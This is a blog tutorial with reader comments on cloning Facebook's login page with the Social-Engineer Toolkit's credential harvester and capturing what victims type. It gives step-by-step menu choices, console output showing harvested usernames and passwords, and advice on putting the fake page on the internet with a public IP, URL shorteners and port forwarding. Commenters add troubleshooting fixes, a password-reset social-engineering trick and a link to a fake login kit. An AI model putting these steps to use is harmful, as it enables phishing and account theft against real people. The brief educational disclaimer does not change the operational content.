Monday, May 26, 2014

Social Engineering Toolkit - Kali : Credential Harvestor : Hack Facebook

By Shashwat May 26, 2014 , , , , , , , , , , , ,
  • Disclaimer - TLDR; some stuff here can be used to carry out illegal activity, our intention is, however, to educate

Hacking Facebook

In the previous post I've discussed how not to hack Facebook. Here we will discuss how to hack Facebook. This tutorial is meant for enhancing you networking skills, as well as to develop understanding of how fake web pages are created, so that you can protect yourself from such attacks. Don't use this information to hack someone's account, or you'll run the risk of getting into legal troubles. If you haven't yet read the previous post, you should. It might not be very enlightening in terms of technical details, but it quite enjoyable and will provide you with a background of what we are looking at.

Social Engineering Toolkit

Humans are the weakest link in any security system ~Shashwat (That'll be me)
If you have read the previous post, then you know what I'm talking about. Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

Kali Linux

I don't feel the need to mention it, but I'll still do it. You need Kali Linux to proceed with this tutorial. Check out the top of the page and see the "Kali Linux complete" tutorial. Better yet, I'll link it here- Kali Linux : What it is and how to install

Se-toolkit

Start Kali Linux. In a console/terminal type se-toolkit.
Something like this will show up

root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart

                  _______________________________
                 /   _____/\_   _____/\__    ___/
                 \_____  \  |    __)_   |    |
                 /        \ |        \  |    |
                /_______  //_______  /  |____|
                        \/         \/          
  [---]        The Social-Engineer Toolkit (SET)         [---]      
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]                 Version: 4.3.9                   [---]
  [---]              Codename: 'Turbulence'              [---]
  [---]         Follow us on Twitter: @trustedsec        [---]
  [---]         Follow me on Twitter: @dave_rel1k        [---]
  [---]       Homepage: https://www.trustedsec.com       [---]
     Welcome to the Social-Engineer Toolkit (SET). The one
      stop shop for all of your social-engineering needs.
 
      Join us on irc.freenode.net in channel #setoolkit
  The Social-Engineer Toolkit is a product of TrustedSec.
           Visit: https://www.trustedsec.com
 Select from the menu:
   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit
set> 
Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]

Explanation

  • 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
  • The 2 selects Website Attack Vectors. Not that obvious.  The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
  • Then, the 3 selects Credential Harvestor.  The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.
Now you'll be seeing something like this-

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.
 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.
 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   1) Web Templates
   2) Site Cloner
   3) Custom Import
  99) Return to Webattack Menu

Type 2 to select site cloner.

Find your IP

On a new terminal type ifconfig. This will give you your ipv4 address, which is what you are looking for


Back to se-toolkit

 Now it'll ask you to specify the IP to which the data is supposed to be sent to. That'll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.

Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/

Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.

Live demonstration

To make sure that the demonstration is not just a repetition of what you already know, I have decided to clone the login page of facebook, instead of homepage. It will be a tad bit different. Here is a screenshot of what I did.
The IP address is my internal address from ifconfig, which comes out to be 192.168.154.133. The cloned page is https://www.facebook.com/login.php. Now we will try to see if this credential harvestor works.

On the Kali Linux Machine itself


Entering the IP in browser shows you the fake login page. Also, se-toolkit registers the visit and says 192.168.154.133 - - [27/May/2014 02:32:32] "GET / HTTP/1.1" 200 -
Now if we enter something in the field, it also shows up on se-toolkit. I entered 'hackingwithkalilinux' in username field and 'password' in password field. This is what se-toolkit shows-
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
Also note that se-toolkit might keeping dumping more stuff in the console, most of which is not important for the time being.

On Windows 8 machine (host)

Now I'm running Kali on a virtual machine. Windows 8 is the host machine, and we might want to check if it works on Windows 8. Also, we would also like to see if modern browsers are able to observe anything wrong with the page, and if the firewall stops the data flow.
I entered windows8host and password2 and pressed the login button. This is what I got. Also, as I was logged in to Facebook with my personal account, the fake page redirected me to facebook.
POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2

Conclusion : This method pretty much works well over LAN.

Make it work over internet

To make the technique work over internet, you will need to use your public IP instead of private. Search google for what is my IP to find you public IP. Then use it. You can use tinyurl or something to make the url appear legitimate. Also, port forwarding might need to be enabled, as your router might block traffic on port 80. Firewall can also cause troubles. While this tutorial was nothing more than - se-toolkit 1 2 3 [your IP] [facebook.com], the next post on getting your credential harvestor on the internet will make the tutorial complete and useful in practical sense. Next tutorial will help you make your fake login page accessible over the internet. [Coming Soon] There you go -  http://www.kalitutorials.net/2014/05/credential-harvestor-port-forwarding.html
Share with your friends
Posted by at
Labels: , , , , , , , , , , , ,

54 comments:

  1. SomeguyJuly 8, 2014 at 11:48 PM

    Im running Kali, but im running into some problems. for this is asks me if i should have bleeding edge updates on, should i say yes or no? I have tried both ways "yes" and "no" and after im done putting in my ip, and the the web address to copy it says "copying website" "this my take a while" it finishes that command and then tells me that it is over and to push [enter] then redirects me right to the Social engineering page?? and it doesn't record any information..... (PS: I know the fake webpage works because I was able to access it by typing in my ip to icewesal.)

    ReplyDelete
    Replies
    1. AnonymousMay 11, 2015 at 2:38 AM

      you can access to the page fill the email and password field, then to see the captured data you have to go to /var/www, there youll find a file named harvester*.txt
      Thats the file where SET saves all captured credentials. that happends in new versions of kali.

      Delete
    2. JohnJuly 9, 2023 at 6:28 PM

      I using it improve my skills.

      Delete
  2. AnonymousJune 8, 2015 at 10:25 AM

    when i try to acccess the fake website it says "unable to connect" please help me someone.

    ReplyDelete
    Replies
    1. forresthopkinsaSeptember 2, 2015 at 1:26 PM

      Did you figure it out? Can you elaborate on the problem?

      Delete
    2. AnonymousDecember 11, 2016 at 11:34 AM

      facing the same problem

      Delete
  3. rockerJuly 21, 2015 at 1:21 PM

    hi on backtrack linux was cd /pentest/ heere all the tools / but in kali linx how was ??

    ReplyDelete
  4. AnonymousSeptember 2, 2015 at 10:38 AM

    Unable to connect also. no logs on SET

    ReplyDelete
  5. UnknownSeptember 9, 2015 at 4:45 PM

    users on my network can access the fake page. User outside my network can not access the page using my IP wan.

    ReplyDelete
    Replies
    1. AnonymousDecember 2, 2016 at 8:11 PM

      Yes,the same problem is happening with me

      Delete
    2. AnonymousFebruary 26, 2017 at 3:25 PM

      you need to port forward your router and use your internet ip in setoolkit.

      Delete
  6. Ankit ChauhanOctober 13, 2015 at 12:12 AM

    says use apache server like something...asks to starting using Apache server ?

    ReplyDelete
    Replies
    1. AnonymousDecember 22, 2015 at 9:47 PM

      Your going to have to enable Apache because that is what it uses to Clone the site, this is often a prompt which is established by the program upon running it for the first time.

      I came across this problem basically upon sending my request for setoolkit to clone a particular site i.e Facebook the page was not copied and i was shown a default Apache2 debain page. To fix this problem there just needs to changes made to 000-default.conf file in the Apache2 folder, there is code at the bottom;

      cd /etc/apache2/sites-available
      nano 000-default.conf

      Now you shall open a document there has to be change done where DocumentRoot /var/www/html it should be changed to DocumentRoot /var/www
      finally restart the Apache2 server;

      sudo service apache2 restart

      this should cause the site cloning to work.

      Delete
  7. AnonymousNovember 4, 2015 at 7:09 AM

    when I send the link to the victimit,it doesn't open on its PC ,
    can you help mee out

    ReplyDelete
  8. Sangeen khanNovember 27, 2015 at 12:54 PM

    when i enter my ip in browser the apache page is opening , plz help me

    ReplyDelete
  9. AnonymousDecember 25, 2015 at 2:39 PM

    Hey there I have an issue regarding an android payload, when I open the apk file on the phone , and have msfconsole open and ready, after opening the apk there is no communication/sessions? I tried port triggering the lports i used but nothing... What do you think is going on?
    Thank you

    ReplyDelete
  10. AnonymousJanuary 8, 2016 at 8:01 AM

    nothing gets printed in my harvest text file...what is the issue??

    ReplyDelete
  11. AnonymousJanuary 15, 2016 at 10:40 AM

    For a better experience on Facebook, switch to our basic site or update your browser.this is the problem when i enter my ip in the url.
    and also when i enter username and password those data are not get loaded into the harvest_date.txt file.
    can you help me out of this????

    ReplyDelete
    Replies
    1. AnonymousJanuary 15, 2016 at 10:54 AM

      sorry.....got it.thanks to anonymous@December 22, 2015 at 9:47 PM

      Delete
  12. UnknownMarch 3, 2016 at 11:39 AM

    after doing the steps to copying ip to the browser, after that it shows up nothing?

    ReplyDelete
  13. AnonymousApril 20, 2016 at 3:19 AM

    Doesnt work on my google chrome but on my internet explorer it displays the user and pass of the victim...
    Need some little advice. . . .

    ReplyDelete
  14. TrimApril 22, 2016 at 1:45 AM

    Hi. After I cloned the website and open the url on my other machine. Apache2 Debian Default Page opens.. Help

    ReplyDelete
    Replies
    1. TrimApril 22, 2016 at 1:55 AM

      I got it. You need to move the copied files into html file.

      Delete
  15. UnknownJune 7, 2016 at 12:20 PM

    how to make statistic ip

    ReplyDelete
  16. AnonymousJuly 9, 2016 at 1:18 PM

    How would one go about sanitation of the attack system after conducting the attack? Launcher.hta keeps dropping back into the /var/www/html directory.

    ReplyDelete
  17. AnonymousSeptember 18, 2016 at 1:07 PM

    These tutorials are soooo coolll!!! im gonna show that to my friends :)

    ReplyDelete
  18. UnknownDecember 6, 2016 at 2:04 AM

    most people use facebook app to login to their account, so therefore this kind of attack maynot be of use. Is it possible to capture the data that the cellphone is exchanging with the server to actually decode a username and the password?

    ReplyDelete
    Replies
    1. ShashwatDecember 7, 2016 at 1:49 AM

      Capturing the data isn't all that hard. Wireshark in promiscuous mode will do that for you. Airodump-ng too. The problem is that the data is encrypted with a very strong cipher (AES 128 bits I think), which we can't decode.

      Delete
    2. AnonymousJanuary 20, 2017 at 5:33 PM

      THIS IS WHERE SOCIAL ENGINEERING COMES INTO PLAY, Use your imagination. Ive sent someone a reset code and shortly after a "Password reset link" to facebook. And to change it back enter your last used credentials. ;)

      Delete
  19. AnonymousDecember 21, 2016 at 3:31 AM

    Here's a custom fake login page to harvest credentials
    https://github.com/jeretc/cfp

    ReplyDelete
  20. AnonymousApril 5, 2017 at 1:52 PM

    that is a great tutorial thanks for sharing it.

    ReplyDelete
  21. Royal ServiceApril 17, 2017 at 4:13 AM

    There are a lot of employees which are hired in order to increase the work force in electric energy and power engineering industry.
    Floods pro yelp page

    ReplyDelete
  22. sok chandarithApril 29, 2017 at 1:31 AM

    hi team anonymouse i would like connection with team

    ReplyDelete
  23. sok chandarithApril 29, 2017 at 1:33 AM

    i am management cambodia hacker team

    ReplyDelete
  24. sok chandarithApril 29, 2017 at 1:34 AM

    when you see the comment you come to my pagefacebook name cambodia hacker team

    ReplyDelete
  25. AnonymousJune 9, 2017 at 12:08 PM

    i cloned the gmail website.. when i entered my email id and clicked next it showed "the connection was reset".. what shall i do

    ReplyDelete
  26. SM FahimJuly 13, 2017 at 2:47 PM

    Well,everything gone right.
    I send the ip to my friend and told him to tell me what he see there.He said it's just loading and not showing any pages.
    But my main problem is,
    I send the ip to a victim and can't wait whole the day long with my pc on.
    Is there a way where i can see all the hits whenever i came back to my pc?

    ReplyDelete
  27. AnonymousJanuary 25, 2018 at 6:36 AM

    [*] Cloning the website: https://login.facebook.com/login.php
    [*] This could take a little bit...
    [*] Error. Unable to clone this specific site. Check your internet connection.

    ReplyDelete
  28. Robert Andrew 5November 6, 2018 at 4:57 AM

    Here's our rundown of some essential camping gear that you never knew you ... Our top15 picks for adventure activewear . news

    ReplyDelete
  29. AnonymousJanuary 15, 2019 at 4:08 PM

    i got this error how to over come this one

    You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.

    ReplyDelete
  30. Graphic AidMay 2, 2019 at 11:08 PM

    Nice Article.
    https://www.graphic-aid.com/clipping-path
    https://www.graphic-aid.com/
    https://www.graphic-aid.com/neck-joint-service

    ReplyDelete
  31. gauthamJune 2, 2019 at 9:36 PM

    Social engineering is an attack relies mainly on human interactions. which mainly involves in getting a users information of important passwords or any atm card numbers etc. learn how to protect it from through ethical hacking certification

    ReplyDelete
  32. ABJuly 31, 2019 at 5:57 AM

    I definitely enjoying every little bit of it and I have you bookmarked to check out new stuff you post. ISO 27001 toolkit

    ReplyDelete
  33. CharlesdayAugust 1, 2019 at 1:18 AM

    I feel very grateful that I read this. It is very helpful and very informative and I really learned a lot from it. Auto Likes Instagram

    ReplyDelete
  34. CharlesdayAugust 1, 2019 at 1:27 AM

    I feel very grateful that I read this. It is very helpful and very informative and I really learned a lot from it. countdown email

    ReplyDelete
  35. CharlesdayAugust 1, 2019 at 1:34 AM

    I feel very grateful that I read this. It is very helpful and very informative and I really learned a lot from it. دانلود فیلم و سریال

    ReplyDelete
  36. CharlesdayAugust 1, 2019 at 1:42 AM

    I feel very grateful that I read this. It is very helpful and very informative and I really learned a lot from it. home repiping services Riverside

    ReplyDelete
  37. CharlesdayAugust 1, 2019 at 1:48 AM

    I feel very grateful that I read this. It is very helpful and very informative and I really learned a lot from it. Water Heater Repair Corona

    ReplyDelete
  38. Repairtech SolutionsDecember 26, 2019 at 10:07 PM

    Greetings! Very useful advice in this particular article! It's the little changes that will make the biggest changes. Thanks for sharing! onsite mobile repair bangalore Hi there! This article could not be written much better! Looking at this post reminds me of my previous roommate! He continually kept talking about this. I most certainly will send this information to him. Fairly certain he's going to have a very good read. Thank you for sharing! asus display replacement Howdy, I believe your blog could possibly be having internet browser compatibility problems. Whenever I look at your site in Safari, it looks fine however, when opening in I.E., it's got some overlapping issues. I simply wanted to give you a quick heads up! Apart from that, great site! huawei display repair bangalore

    ReplyDelete
  39. Repairtech SolutionsDecember 26, 2019 at 10:08 PM

    Having read this I thought it was rather enlightening. I appreciate you spending some time and effort to put this short article together. I once again find myself spending way too much time both reading and leaving comments. But so what, it was still worthwhile! vivo charging port replacement Hello there! I could have sworn I’ve been to your blog before but after looking at many of the posts I realized it’s new to me. Regardless, I’m certainly delighted I stumbled upon it and I’ll be book-marking it and checking back often! lg service center Bangalore I need to to thank you for this wonderful read!! I definitely loved every bit of it. I've got you saved as a favorite to check out new things you post… motorola display repair bangalore

    ReplyDelete
  40. sid seoJuly 19, 2021 at 6:43 AM

    Im no expert, but I believe you just made an excellent point. You certainly fully understand what youre speaking about, and I can truly get behind that. facebook ads

    ReplyDelete
  41. PeterAugust 27, 2021 at 6:52 AM

    Yeah, I just ended up you first bonus post"Hack Facebook Account : Stuff You Should Know" that proved that actually it's impossible to hack facebook account. Now diving into this post I was overwhelmed with the social engineering toolkit details with it functionality and installing details. I admire your super knowledgeable project that made us so aware of hacking issue what is possible and what not. Perhaps I have to get this Kali toolkit. At the same time there are so much hacking sites out there online. Some offered like "hacker for hire". How can I know those service is ethical or unethical? Thanks for your time and cordial help.

    ReplyDelete
  42. AnonymousApril 7, 2022 at 4:19 AM

    Social Engineering Toolkit - Kali : Credential Harvestor : Hack Facebook - Kali Linux Hacking Tutorials >>>>> Download Now

    >>>>> Download Full

    Social Engineering Toolkit - Kali : Credential Harvestor : Hack Facebook - Kali Linux Hacking Tutorials >>>>> Download LINK

    >>>>> Download Now

    Social Engineering Toolkit - Kali : Credential Harvestor : Hack Facebook - Kali Linux Hacking Tutorials >>>>> Download Full

    >>>>> Download LINK MO

    ReplyDelete
  43. elishadasDecember 16, 2024 at 5:10 AM

    The Social Engineering Toolkit (SET) in Kali Linux allows using the Credential Harvester tool to capture login credentials. When used with a cloned Facebook login page, it simulates a legitimate site, prompting victims to enter credentials. Maintain professionalism and respect in all interactions, even during adversarial proceedings. Adhere strictly to ethical standards and avoid conflicts of interest.
    divorce in virginia
    chapter 7 lawyers near me

    ReplyDelete

Subscribe to: Post Comments (Atom)
© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.